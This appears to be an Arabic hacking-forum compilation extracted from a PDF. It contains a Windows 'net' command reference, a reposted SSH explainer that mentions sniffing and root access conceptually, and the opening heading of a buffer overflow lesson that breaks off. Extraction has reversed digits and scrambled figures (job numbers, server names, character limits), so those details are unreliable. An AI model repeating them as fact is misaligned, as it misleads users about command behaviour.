                ‫أن تتمكن من إضافتها إلى مجموعة محلية بواسطة هذا األمر .‬
                                                                  ‫‪/delete‬‬
                     ‫تزيل اسم مجموعة أو اسم مستخدم من مجموعة محلية .‬
                                                ‫‪net help command‬‬
                                         ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                            ‫مالحظات‬
                                                       ‫استخدام ‪/domain‬‬
               ‫تطبق ‪ /domain‬فقط على أجهزة كمبيوتر ‪Windows XP‬‬
      ‫‪Professional‬األعضاء في مجال ما. افتراضياً، تنفذ أجهزة كمبيوتر‬
                             ‫الملقم العمليات على وحدة تحكم المجال األساسية.‬
                                                          ‫استخدام ‪name‬‬
‫افصل اإلدخاالت المتعددة باستخدام فراغات. يمكن أن تكون األسماء عبارة عن‬
       ‫مستخدمين محليين، أو مستخدمين على المجاالت األخرى، أو مجموعات‬
       ‫عمومية، لكن ال يمكن أن تكون من المجموعات المحلية األخرى. إذا كان‬
       ‫المستخدم من مجال آخر، استهل اسم المستخدم باسم المجال (على سبيل‬
                                                ‫المثال.)‪، Sales\Ralphr‬‬
                                                        ‫تجميع المستخدمين‬
            ‫استخدم ‪ net localgroup‬لتجميع المستخدمين الذين يستخدمون‬
        ‫الكمبيوتر أو شبكة االتصال بطرق متشابهة أو بنفس الطرق. عند تعيين‬
  ‫الحقوق لمجموعة محلية، فإن كل عضو في المجموعة المحلية يملك تلقائيا ً‬
                                                            ‫الحقوق نفسها.‬
                              ‫أمثلة‬
         ‫لعرض قائمة بكافة المجموعات المحلية على الملقم المحلي، اكتب:‬
                                                 ‫‪net localgroup‬‬
‫إلضافة مجموعة محلية تدعى ‪ Exec‬إلى قاعدة بيانات حسابات المستخدمين‬
                                                        ‫المحلية، اكتب:‬
                                    ‫‪net localgroup exec /add‬‬
  ‫إلضافة مجموعة محلية تدعى ‪ Exec‬إلى قاعدة بيانات حسابات مستخدمي‬
                                                         ‫المجال، اكتب:‬
                        ‫‪net localgroup exec /add /domain‬‬
 ‫إلضافة حسابات المستخدمين الموجودة ،‪ stevev‬و( ‪ ralphr‬من المجال‬
      ‫،)‪Sales‬و ‪ jennyt‬إلى المجموعة المحلية ‪ Exec‬على الكمبيوتر‬
                                                        ‫المحلي، اكتب:‬
‫‪net localgroup exec stevev sales\ralphr jennyt /add‬‬
‫إلضافة حسابات المستخدمين الموجودة ،‪ stevev‬و ،‪ ralphr‬و ‪jennyt‬‬
                                    ‫إلى المجموعة ‪ Exec‬لمجال، اكتب:‬
        ‫‪net localgroup exec stevev ralphr jennyt /add‬‬
                                                           ‫‪/domain‬‬



                      ‫17‬
                ‫لعرض المستخدمين في المجموعة المحلية ‪ Exec‬اكتب:‬
                                      ‫‪net localgroup exec‬‬
               ‫إلضافة تعليق إلى سجل المجموعة المحلية ،‪ Exec‬اكتب:‬
        ‫‪net localgroup exec /comment:"The executive‬‬
                                                        ‫".‪staff‬‬

                                                             ‫‪Net pause‬‬
                            ‫يسبب التوقف المؤقت للخدمات قيد التشغيل حاليا ً.‬
                     ‫بناء الجملة‬
                                                      ‫‪net pause service‬‬

                           ‫المعلمات‬
                                                                 ‫‪service‬‬
           ‫مطلوبة. تعين الخدمة التي تريد إيقافها مؤقتا ً. يسرد الجدول التالي‬
                                                       ‫بعض قيم .‪service‬‬
               ‫الوصف‬                                ‫القيمة‬
       ‫تؤدي إلى إيقاف الخدمة ‪Net‬‬
                                                      ‫‪netlogon‬‬
                 ‫‪Logon‬مؤقتا ً.‬
   ‫تؤدي إلى إيقاف الخدمة ‪NT LM‬‬
                                            ‫‪"nt lm security‬‬
        ‫‪Security Support‬‬
                                          ‫"‪support provider‬‬
            ‫‪Provider‬مؤقتا ً.‬
 ‫تؤدي إلى إيقاف خدمة جدولة المهام‬
                                                      ‫‪schedule‬‬
                               ‫مؤقتا ً.‬
 ‫تؤدي إلى إيقاف خدمة الملقم مؤقتا ً.‬                      ‫‪server‬‬
  ‫تؤدي إلى إيقاف خدمة محطة العمل‬
                                                  ‫‪workstation‬‬
                           ‫مؤقتا ً.‬
                                                 ‫‪net help command‬‬
                                          ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                             ‫مالحظات‬
 ‫على ملقم ما، استخدم ‪ net pause‬قبل إيقاف الخدمة للسما ح للمستخدمين‬
‫بإتمام المهام أو قطع االتصال بالموارد. إن التوقف المؤقت للخدمة يضعها في‬
 ‫حالة حجز، لكنه ال يزيل البرنامج من الذاكرة. يمكن للمستخدمين الذين لديهم‬
    ‫اتصال مسبق بالمورد إنهاء المهام الخاصة بهم، ولكن يتم منع االتصاالت‬
                                                           ‫الجديدة بالمورد.‬
    ‫إذا كنت تخطط إليقاف خدمة تؤثر على الموارد المشتركة، قم أوالً بإيقافها‬
‫مؤقتا ً. استخدم ‪ net send‬لبث رسالة تفيد بأنك ستعمل على إيقاف الخدمة.‬
    ‫بعد تزويد األشخاص بالوقت الكافي لالنتهاء من استخدام المورد، استخدم‬
                                                ‫‪net stop‬إليقاف الخدمة.‬
               ‫إلعادة تنشيط خدمة تم إيقافها مؤقتاً، استخدم.‪net continue‬‬
      ‫ال يمكنك إيقاف كافة الخدمات مؤقتا ً. يؤثر التوقف المؤقت على الخدمات‬
                                                          ‫باألشكال التالية :‬
 ‫إن اإليقاف المؤقت لخدمة ‪ Net Logon‬يمنع الكمبيوتر من معالجة طلبات‬
‫تسجيل الدخول. إذا كان للمجال ملقمات تسجيل دخول أخرى، يمكن أن يستمر‬
                                ‫تسجيل دخول المستخدمين إلى شبكة االتصال .‬
‫إن اإليقاف المؤقت لخدمة الملقم يمنع المستخدمين من إجراء اتصاالت جديدة‬


                      ‫27‬
   ‫بالموارد المشتركة للملقم. في حال عدم وجود ملقمات تسجيل دخول أخرى‬
 ‫على شبكة االتصال، فإن ذلك يمنع المستخدمين من تسجيل الدخول إلى شبكة‬
  ‫االتصال. ال تتأثر االتصاالت الموجودة. يمكن للمسؤولين إجراء اتصاالت مع‬
                                       ‫الملقم حتى إذا تم إيقافه بشكل مؤقت.‬
 ‫إن اإليقاف المؤقت لخدمة محطة العمل يحفظ اسم المستخدم، وكلمة المرور،‬
‫واالتصاالت معرفة، ولكنه يوجه الطلبات من أجل أجهزة الطباعة إلى الطابعات‬
                      ‫المتصلة بالكمبيوتر بدالً من الطابعات المتصلة بالشبكة.‬
    ‫إذا كان اسم الخدمة يحتوي على فراغات، استخدم عالمات االقتباس حول‬
                        ‫النص (على سبيل المثال .)"‪، "Service Name‬‬
                             ‫أمثلة‬
                                   ‫إليقاف خدمة الملقم بشكل مؤقت، اكتب:‬
                                               ‫‪net pause server‬‬
     ‫إذا كان اسم الخدمة يتألف من كلمتين أو أكثر، عليك تضمين اسم الخدمة‬
       ‫ضمن عالمات اقتباس. على سبيل المثال، إليقاف الخدمة " ‪NT LM‬‬
                    ‫‪ "Security Support Provider‬مؤقتاً، اكتب:‬
           ‫"‪net pause "nt lm security support provider‬‬

                                                         ‫‪Net print‬‬
 ‫يعرض معلومات حول قائمة انتظار طباعة معينة، أو يعرض معلومات حول‬
‫كافة قوائم انتظار الطباعة التي تتم استضافتها من قبل ملقم طباعة معين، أو‬
‫يعرض معلومات حول مهمة طباعة معينة، أو يتحكم بها. عند االستخدام دون‬
     ‫معلمات، يعرض ‪net print‬تعليمات سطر األوامر لألمر.‪net print‬‬
 ‫لعرض معلومات حول قائمة انتظار طباعة معينة أو حول كافة قوائم انتظار‬
                     ‫الطباعة التي تتم استضافتها من قبل ملقم طباعة معين‬
                    ‫بناء الجملة‬
                       ‫]‪net print \\ComputerName[\QueueName‬‬

                          ‫المعلمات‬
                                                  ‫‪\\ComputerName‬‬
          ‫مطلوبة. تعين، حسب االسم، الكمبيوتر الذي يستضيف قائمة انتظار‬
                        ‫الطباعة التي ترغب بعرض المعلومات المتعلقة بها .‬
                                                         ‫‪\QueueName‬‬
                 ‫تعين، حسب االسم، قائمة انتظار الطباعة التي ترغب بعرض‬
            ‫المعلومات الخاصة بها. في حال تعيين كمبيوتر وعدم تعيين قائمة‬
            ‫انتظار، يتم عرض المعلومات المتعلقة بكافة قوائم انتظار الطباعة‬
                                                    ‫على الكمبيوتر المعين .‬
                                                  ‫‪net help net print‬‬
                               ‫تعرض التعليمات الخاصة باألمر .‪net print‬‬
                            ‫مالحظات‬
       ‫يعرض ‪ Net print‬عدة أنواع من المعلومات المتعلقة بقوائم انتظار‬
  ‫الطباعة. المثال التالي هو مثال عن تقرير يتعلق بكافة قوائم انتظار الطباعة‬
                                         ‫على الملقم المسمى :0002‪NOR‬‬
                                    ‫قوائم انتظار الطابعة عند0002‪\\NOR‬‬
                     ‫‪Name‬‬                ‫# ‪Job‬‬      ‫‪Size‬‬         ‫‪Status‬‬

                 ‫---------------------------------------------------------‬


                     ‫37‬
   ‫‪*Queue Active*LASER Queue‬‬                       ‫‪1 jobs‬‬

                        ‫1‪USER‬‬             ‫48‬        ‫0‬      ‫‪Spooling‬‬
                           ‫أمثلة‬
       ‫لسرد محتويات قائمة انتظار الطباعة ‪ Dotmatrix‬على الكمبيوتر‬
                                           ‫0002‪، \\NOR‬اكتب:‬

                             ‫‪net print \\NOR2000\dotmatrix‬‬

                   ‫لعرض معلومات حول مهمة طباعة معينة أو التحكم بها‬

                 ‫بناء الجملة‬
‫]‪JobNumber [{/hold | /release | net print [\\ComputerName‬‬
                                                  ‫]}‪/delete‬‬

                        ‫المعلمات‬
                                                 ‫‪\\ComputerName‬‬
         ‫تعين، حسب االسم، الكمبيوتر الذي يستضيف مهمة الطباعة التي‬
      ‫تريد التحكم بها. إذا لم تعين كمبيوتر، يتم افتراض الكمبيوتر المحلي.‬
                                                        ‫‪JobNumber‬‬
         ‫مطلوبة. تعين رقم مهمة الطباعة التي تريد التحكم بها. يتم تعيين‬
          ‫هذا الرقم من قبل الكمبيوتر الذي يستضيف قائمة انتظار الطباعة‬
           ‫التي تم إرسال مهمة الطباعة إليها. بعد أن يعين الكمبيوتر رقما ً‬
        ‫لمهمة الطباعة، ال يتم تعيين هذا الرقم ألي مهمة طباعة أخرى في‬
                      ‫أي قائمة انتظار تتم استضافتها من قبل ذلك الكمبيوتر.‬
                                       ‫}‪{/hold | /release | /delete‬‬
          ‫تعين اإلجراء الذي يجب اتخاذه مع مهمة الطباعة. تؤخر المعلمة‬
       ‫‪ /hold‬المهمة، مما يسمح لمهام الطباعة األخرى بتجاوزها إلى أن‬
              ‫يتم تحريرها. تحرر المعلمة ‪ /release‬مهمة الطباعة التي تم‬
         ‫تأخيرها. تزيل المعلمة ‪ /delete‬مهمة الطباعة من قائمة انتظار‬
             ‫الطباعة. في حال تعيين رقم للمهمة وعدم تعيين أي إجراء، يتم‬
                                 ‫عرض المعلومات المتعلقة بمهمة الطباعة.‬
                                                 ‫‪net help net print‬‬
                              ‫تعرض التعليمات الخاصة باألمر .‪net print‬‬
                         ‫مالحظات‬
                   ‫المثال التالي هو مثال عن تقرير يتعلق بمهمة طباعة :‬
                                               ‫# ‪Job‬‬             ‫02‬

                                           ‫‪Status‬‬            ‫‪Waiting‬‬

                                                  ‫‪Size‬‬             ‫903‬

                                                             ‫‪Remark‬‬



                   ‫47‬
                                   ‫‪Submitting user HISHEM‬‬

                                          ‫‪Notify‬‬           ‫‪HISHEM‬‬

                                                   ‫‪Job data type‬‬

                                                ‫‪Job parameters‬‬

                                                  ‫‪Additional info‬‬




                          ‫أمثلة‬
‫لعرض معلومات حول المهمة ذات الرقم 26 على الكمبيوتر 0002‪، \\NOR‬‬
                                                          ‫اكتب:‬
                                  ‫02 0002‪net print \\NOR‬‬
       ‫لتأخير المهمة ذات الرقم 26 على الكمبيوتر 0002‪، \\NOR‬اكتب:‬
                           ‫‪net print \\NOR2000 20 /hold‬‬
      ‫لتحرير المهمة ذات الرقم 26 على الكمبيوتر 0002‪، \\NOR‬اكتب:‬
                        ‫‪net print \\NOR2000 20 /release‬‬

                                                      ‫‪Net send‬‬
‫يرسل الرسائل إلى مستخدمين، أو أجهزة كمبيوتر، أو أسماء مراسالت أخرى‬
                                                 ‫على شبكة االتصال.‬
                  ‫بناء الجملة‬
      ‫‪{name | * | /domain[:name] | /users} messagenet send‬‬

                        ‫المعلمات‬
                                                                ‫‪name‬‬
         ‫تعين اسم المستخدم، أو اسم الكمبيوتر، أو اسم المراسلة التي تريد‬
         ‫إرسال الرسالة إليها. إذا كانت المعلومات التي توفرها تحتوي على‬
        ‫فراغات، استخدم عالمات االقتباس حول النص (على سبيل المثال ،‬
               ‫.)"‪"Computer Name‬ربما تؤدي أسماء المستخدمين‬
       ‫الطويلة إلى حدوث مشاكل عند استخدامها كأسماء ‪ .NetBIOS‬يتم‬
        ‫تحديد أسماء ‪ NetBIOS‬بـ 22 حرفاً، ويتم حجز الحرف السادس‬
                                                                   ‫عشر.‬
                                                                      ‫*‬
                ‫ترسل الرسالة إلى كافة األسماء الموجودة في المجال أو في‬
                                              ‫مجموعة العمل الخاصة بك .‬
                                                     ‫‪/domain:name‬‬
             ‫ترسل الرسالة إلى كافة األسماء الموجودة في مجال الكمبيوتر.‬
          ‫يمكنك تعيين ‪name‬إلرسال الرسالة إلى كافة األسماء الموجودة‬
                                 ‫في المجال أو في مجموعة العمل المعينة .‬
                                                               ‫‪/users‬‬
                    ‫ترسل الرسالة إلى كافة المستخدمين المتصلين بالملقم .‬
                                                           ‫‪message‬‬
                                              ‫مطلوبة. تعين نص الرسالة .‬


                   ‫57‬
                                             ‫‪net help command‬‬
                                      ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                           ‫مالحظات‬
‫يمكنك إرسال رسالة إلى اسم نشط موجود على الشبكة فقط. في حال‬        ‫‪‬‬
 ‫إرسال الرسالة إلى اسم مستخدم، يجب أن يكون قد تم تسجيل دخول‬
               ‫هذا المستخدم وتشغيل خدمة المرسل لتلقي الرسالة .‬
    ‫يمكنك بث رسالة إلى كافة األسماء الموجودة في مجال الكمبيوتر‬    ‫‪‬‬
        ‫الخاص بك (استخدم * أو ‪)، /domain‬أو في مجال مختلف‬
  ‫(:‪DomainName). /domain‬يمكن أن تحتوي رسائل البث‬
      ‫على 062 حرفا ً كحد أقصى. انتبه عند إرسال الرسائل إلى عدة‬
                                                     ‫مستخدمين .‬
‫تسمح لك ‪ /users‬بإرسال رسالة إلى كافة المستخدمين الذين لديهم‬       ‫‪‬‬
          ‫جلسات عمل مع الملقم. انتبه عند إرسال الرسائل إلى عدة‬
                                                      ‫مستخدمين.‬
‫يجب تشغيل خدمة المرسل ليتم استالم الرسائل. لمزيد من المعلومات‬     ‫‪‬‬
                ‫حول كيفية تشغيل خدمة، راجع مواضيع ذات صلة .‬

                            ‫أمثلة‬
‫إلرسال الرسالة ".‪"Meeting changed to 3 P.M. Same place‬‬
                                     ‫إلى المستخدم ،‪ robertf‬اكتب:‬
 ‫‪net send robertf Meeting changed to 3 P.M. Same‬‬
                                                          ‫.‪place‬‬
          ‫إلرسال رسالة إلى كافة المستخدمين المتصلين بالملقم، اكتب:‬
    ‫5 ‪net send /users This server will shut down in‬‬
                                                       ‫.‪minutes‬‬
                  ‫إلرسال رسالة تتضمن عالمة الخط المائل (/)، اكتب:‬
  ‫‪net send robertf "Format your disk with FORMAT‬‬
                                                              ‫"4/‬

                                                    ‫‪Net session‬‬
 ‫يدير اتصاالت أجهزة كمبيوتر الملقمات. عند االستخدام دون معلمات، يعرض‬
  ‫‪net session‬معلومات حول كافة جلسات العمل مع الكمبيوتر المحلي.‬
                   ‫بناء الجملة‬
                         ‫]‪net session [\\ComputerName] [/delete‬‬

                         ‫المعلمات‬
                                                 ‫‪\\ComputerName‬‬
    ‫تعرف الكمبيوتر الذي من أجله تريد سرد جلسات العمل أو قطع اتصالها .‬
                                                               ‫‪/delete‬‬
   ‫تنهي جلسة عمل الكمبيوتر مع ‪ ComputerName‬وتغلق كافة الملفات‬
               ‫المفتوحة على الكمبيوتر من أجل جلسة العمل هذه. إذا تم حذف‬
‫،‪ComputerName‬يتم إلغاء كافة جلسات العمل على الكمبيوتر المحلي .‬
                                              ‫‪net help command‬‬
                                       ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                                                                   ‫تحذير‬


                    ‫67‬
 ‫إن استخدام ‪ net session‬يمكن أن يؤدي إلى فقدان البيانات. ربما ترغب‬
                          ‫بتحذير المستخدمين قبل قطع اتصال جلسة العمل .‬
                            ‫مالحظات‬
       ‫يمكنك أيضا ً استخدام ‪ net sessions‬أو ‪ net sess‬لتشغيل ‪net‬‬
                                                 ‫.‪session‬‬

           ‫استخدم ‪ net session‬لعرض أسماء أجهزة الكمبيوتر وأسماء‬
    ‫المستخدمين للمستخدمين الموجودين على الملقم، ولمعرفة ما إذا كان لدى‬
 ‫المستخدمين ملفات مفتوحة، ولمعرفة مدة تعطيل جلسات العمل لكل مستخدم.‬

                                    ‫تظهر المعلومات بتنسيق مشابه لمايلي :‬

      ‫‪Computer‬‬             ‫‪User name‬‬            ‫‪Client type Opens‬‬
                                                          ‫‪Idle time‬‬



  ‫------------------------------------------------------------------------‬

   ‫‪BASSETT‬‬           ‫‪CHRISDR‬‬                ‫\\ 1 0002 ‪Windows‬‬
                                                       ‫31:00:00‬

  ‫‪SHARONCA‬‬             ‫‪Administrator‬‬          ‫\\ 0 1.2 ‪DOS LM‬‬
                                                        ‫31:50:10‬

 ‫لعرض جلسة عمل مستخدم واحد، استخدم ‪ ComputerName‬مع األمر.‬
     ‫تتضمن المعلومات المتعلقة بمستخدم وحيد قائمة بالموارد المشتركة التي‬
                                                    ‫يتصل بها المستخدم .‬

    ‫يتم تسجيل جلسة العمل عندما يتصل المستخدم الموجود على العميل بشكل‬
      ‫ناحج بالملقم. تحدث جلسة العمل الناجحة عندما يكون جهازي الكمبيوتر‬
  ‫موجودين على نفس الشبكة، وعندما يكون لدى المستخدم اسم وكلمة مرور‬
   ‫مقبولين من قبل الملقم. يجب أن يكون لدى المستخدم الموجود على العميل‬
      ‫جلسة عمل مع الملقم قبل إمكانية استخدام موارد الملقم، وال يتم تأسيس‬
‫جلسة العمل إلى أن يتصل المستخدم الموجود على العميل بمورد ما. يكون بين‬
 ‫العميل والملقم جلسة عمل واحدة فقط، ولكن يمكن أن يكون لديهما العديد من‬
                                      ‫نقاط اإلدخال، أو االتصاالت، بالموارد.‬

 ‫لتعيين الوقت الذي يمكن أن تبقى خالله جلسة العمل معطلة قبل أن يتم قطع‬
‫اتصالها تلقائياً، عين الميزة ‪ autodisconnect‬باستخدام ‪net config‬‬
‫.‪server /autodisconnect‬لمزيد من المعلومات حول ‪net config‬‬
     ‫،‪server‬راجع مواضيع ذات صلة. يكون قطع االتصال التلقائي شفافا ً‬
       ‫بالنسبة للمستخدم ألنه تتم إعادة اتصال جلسة العمل تلقائيا ً عندما يصل‬
                                            ‫المستخدم إلى المورد مرة ثانية.‬

                    ‫إلنهاء جلسة العمل مع الملقم، استخدم ‪net session‬‬
                                ‫\\ .‪ComputerName /delete‬‬



                      ‫77‬
                           ‫أمثلة‬
             ‫لعرض سرد عن معلومات جلسة العمل للملقم المحلي، اكتب:‬
                                                      ‫‪net session‬‬
‫لعرض معلومات جلسة العمل للعميل ذو اسم الكمبيوتر ،‪ Shepherd‬اكتب:‬
                                      ‫‪net session \\shepherd‬‬
        ‫إلنهاء كافة جلسات العمل بين الملقم والعمالء المتصلين به، اكتب:‬
                                            ‫‪net session /delete‬‬

                                                    ‫‪Net statistics‬‬
 ‫يعرض سجل اإلحصائيات لخدمة الملقم أو محطة العمل المحلية، أو للخدمات‬
‫قيد التشغيل والتي تتوفر اإلحصائيات لها. عند االستخدام دون معلمات، يسرد‬
      ‫‪net statistics‬الخدمات قيد التشغيل التي تتوفر اإلحصائيات لها.‬
                  ‫بناء الجملة‬
                         ‫]}‪net statistics [{workstation | server‬‬

                        ‫المعلمات‬
                                                     ‫‪workstation‬‬

                           ‫تعرض إحصائيات خدمة محطة العمل المحلية .‬

                                                             ‫‪server‬‬

                                  ‫تعرض إحصائيات خدمة الملقم المحلي .‬

                                            ‫‪net help command‬‬

                                      ‫تعرض التعليمات ألمر ‪ net‬المحدد‬



                                                          ‫‪Net view‬‬

 ‫يعرض قائمة المجاالت، أو أجهزة الكمبيوتر، أو الموارد التي تتم مشاركتها‬
 ‫من قبل الكمبيوتر المعين .عند االستخدام دون معلمات، يعرض ‪net view‬‬
                      ‫قائمة بأجهزة الكمبيوتر الموجودة في المجال الحالي.‬

                  ‫بناء الجملة‬
 ‫]]‪net view [\\ComputerName] [/domain[:DomainName‬‬

                ‫]‪net view /network:nw [\\ComputerName‬‬

                        ‫المعلمات‬
                                              ‫‪\\ComputerName‬‬



                   ‫87‬
               ‫تعين الكمبيوتر الذي يحتوي على الموارد المشتركة التي تريد‬
                                                                  ‫عرضها .‬
                                          ‫]‪/domain[:DomainName‬‬
        ‫تعين المجال الذي تريد عرض أجهزة الكمبيوتر المتوفرة فيه. إذا تم‬
             ‫حذف ،‪ DomainName‬يعرض ‪ /domain‬كافة المجاالت‬
                                                      ‫الموجودة في الشبكة .‬
                                                          ‫‪/network:nw‬‬
           ‫تعرض كافة الملقمات المتوفرة على شبكة ‪ .NetWare‬في حال‬
            ‫تعيين اسم كمبيوتر، يعرض ‪ /network:nw‬الموارد المتوفرة‬
              ‫على ذلك الكمبيوتر في شبكة .‪ NetWare‬يمكنك أيضا ً تعيين‬
                       ‫شبكات االتصال األخرى التي تمت إضافتها إلى النظام .‬
                                                ‫‪net help command‬‬
                                         ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                          ‫مالحظات‬
   ‫استخدم األمر ‪ net view‬لعرض قائمة بأجهزة الكمبيوتر. يكون اإلخراج‬
                                                    ‫مشابها ً لمايلي :‬

                                  ‫‪Server Name‬‬                 ‫‪Remark‬‬

                        ‫-------------------------------------------------‬

               ‫‪\\Production‬‬               ‫‪Production file server‬‬

                 ‫1‪\\Print‬‬               ‫‪Printer room, first floor‬‬

            ‫2‪\\Print‬‬               ‫‪Printer room, second floor‬‬

                            ‫أمثلة‬
   ‫لمشاهدة قائمة بالموارد المشتركة من قبل الكمبيوتر ‪، \\Production‬‬
                                                             ‫اكتب:‬

                                           ‫‪net view \\production‬‬

‫لمشاهدة الموارد المتوفرة على ملقم ‪ NetWare‬المسمى ،‪\\Marketing‬‬
                                                        ‫اكتب:‬

                         ‫‪net view /network:nw \\marketing‬‬

     ‫لمشاهدة قائمة بأجهزة الكمبيوتر الموجودة في مجال أو مجموعة عمل‬
                                                    ‫‪ ،sales‬اكتب:‬

                                        ‫‪net view /domain:sales‬‬

                     ‫لمشاهدة كافة الملقمات في شبكة ،‪ NetWare‬اكتب:‬




                   ‫97‬
                        ‫‪net view /network:nw‬‬




        ‫انتهى،،،‬




‫"شرح الـ‪"secure shell‬‬

                        ‫<منقول من منتديات ابن مصر>‬


          ‫08‬
                                                                  ‫<الكاتب:‪> ACID BURN_EG‬‬

                                                               ‫السالم عليكم و رحمه هللا و بركاته :‬
  ‫اليوم سوف نتطلع الى اداه فى النت ورك و هى اداه هامه جداا تستخدمها معظم السرفرات على االنترنت و‬
                                                  ‫هذه االداه هى ال ‪Secure Shell‬اى ال:: ‪SSh‬‬

                                                                         ‫و لنبدأ االن الحديث عنها ::‬

                                                                                  ‫ما هى ال ‪ SSh‬؟‬
                                                                          ‫===============‬
   ‫ال ‪secure shell‬هى اداه (برنامج) لالتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذ‬
  ‫اوامر او مهام معينه داخل هذا الجهاز اى و هو االتصال عن بعد ‪ remotely connection‬و تستخدم‬
‫ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات االتصال الغير‬
        ‫امنه و هى تعتبر كبديل جيد جداا الدوات تستعمل لنفس الغرض فى يونكس مثل ‪(rlogin,rsh and‬‬
                                                                                            ‫.)‪rcp‬‬
                   ‫و تقدم ايضا ال ‪ secure shell‬اتصال امن جداا لشحنات اتصاالت ال ‪ tcp‬كونيكشن .‬



                                                             ‫و هنا يأتى سؤال مهم :: و السؤال هو ::‬

   ‫لماذا يفضل استخدام ال ‪ secure shell‬على االدوات االخرى التى يطلق عليها ‪ r- commands‬فى‬
        ‫يونكس ==================================================‬
                                  ‫======================================‬
                                                                            ‫كالمذكورين فى االعلى ؟‬
                                                             ‫======================‬
          ‫فى توزيعات اليونكس مثل ال ‪ *BSD‬تتعرض االدوات التى يطلق عليها ‪ r- commands‬مثل‬
‫)‪(rlogin,rsh and rcp‬الى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت‬
      ‫اكسيس )‪ (root access‬لالجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اى‬
   ‫ريموتلى يمكنه ان يدخل الى كل بيانات االجهزه التى على الشبكه بدون ادنى صعوبه النه يستطيع بالروت‬
 ‫اكسس ان يعبر من خالل اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و‬
‫هذا ما يسمى بأن الشخص لديه ‪ unauthorized access to systems‬اعتقد انكم فهمتونى االن و‬
  ‫يمكن ايضا الى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خالل شبكتك و تكون هذه‬
                                               ‫الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك‬

  ‫ملحوظه: طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى االختراق و تستخدم فى اختراق المنظمات‬
                                               ‫الكبرى و تقع تحت بند تقفى االثر و االعداد لالختراق )‬

‫و االن نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب االدوات فى يونكس فالسيكيور‬
‫شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى ال يعطيه الحق للدخول‬
 ‫الى بيانات اجهزه الشبكه اال بالباسورد و ال يمكن التحايل على ال ‪ssh‬فى هذه النقطه و بذلك حتى لو تمكن‬
                             ‫الشخص من اكتساب الروت اكسس لن يستطسع االطالع على بيانات الشبكه‬
                                                   ‫اال ب. ‪authorized access to systems‬‬

       ‫و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط‬
    ‫الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله الن السيكيور شيل ال يرسل الباسوردات فى‬
     ‫صوره واضحه كما ترسلها ادوات يونكس االخرى و لكن يرسلها مشفره و لذلك سيكون على المخترق‬
                                                                          ‫محاوله فك الشفره و الخ‬

      ‫و لكن مع كل هذه المزايا لم يخلى ال ‪ secure shell‬من الثغرات و لكن تعتبر ثغراته قليال و تقريبا‬


                                               ‫18‬
‫معظمها يحتاج الى الرووت اكسس و االخرى يمكن ان تخترق السيكيور شل فقط بها (هذا كالم بينى و بينكم)‬

                                                                                     ‫و االن سؤال اخر ::‬

                                                    ‫ما هى انواع الهجوم التى تحمى منها ال ‪ ssh‬؟‬
                        ‫===========================================‬
       ‫-1تحمى من ال ‪ ip spoofing‬اى تحمى من انتحال عنواين االى بى حيث انه لو ارسل شخص ما‬
  ‫باكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال ‪ ssh‬و تحمى ايضا‬
                                           ‫ال ‪ ssh‬من المنتحلين على الشبكه المحليه اى. ‪localy‬‬

                                                             ‫-2تحمى مما يسمى ال ‪DNS spoofing‬‬

             ‫-3تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس‬

  ‫-4تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت الى داتا مخزنه‬

     ‫و لكن مع كل هذا فأن ال ‪ ssh‬ليس امن بدرجه كبيره حيث ان االشخاص ذو خبره كبيره فى النت ورك‬
‫يستطيعون ان يجعلون ال ‪ ssh‬ينقطع عن االتصال اى ‪ disconnected‬و لكن ال يمكن ان يكسرو تشفير‬
                                                ‫بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها .‬

‫و ايضا كل االشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها‬
      ‫ال ‪ ssh‬و هى تسمح بأكثر من نوع تشفير مثل ,821-4‪(three-key triple-DES, DES, RC‬‬
   ‫)‪TSS, Blowfish‬يمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى االداه تسمح لك بعدم‬
   ‫تشغيل التشفير اى" ‪ encryption of type "none‬و بهذا تجعلنى اقول عليك احمق ! الن هذا يجعل‬
     ‫ال ‪ ssh‬سهله االختراق مثل االدوات التى تم ذكرها فى اول الموضوع فى يونكس , حيث ان هذا التشفير‬
 ‫ايضا يمنع ال ‪ ip spoofing‬و ال ‪ DNS spoofing‬و هذا ايضا باالضافه الى تغيير مفاتيح فك التشفير‬
                                        ‫كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما.‬

  ‫اذن فهى اداه حقا مميزه و تستحق االحترام و االهتمام مع انها ال تخلو من الثغرات و لكن لنجعلها افضل ما‬
                                                                                 ‫موجود فى هذا المجال‬

   ‫ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسن‬
                                                                                          ‫ظنكم.‬

                                                ‫انتهى،،،‬




                      ‫" شرح معنى الـ‪" Buffer Overflows‬‬

                                                              ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬

                                                                                   ‫<الكاتب:‪> LAMeR‬‬


                                                  ‫28‬
                    ‫اقدم لكم درس يشر ح ما معنى الـ .. ‪ Buffer Overflows‬وانشاهلل تستفيدون منه‬

                                                                                          ‫يله نبدأ‬

                                                                                 ‫محتويات الدرس:‬

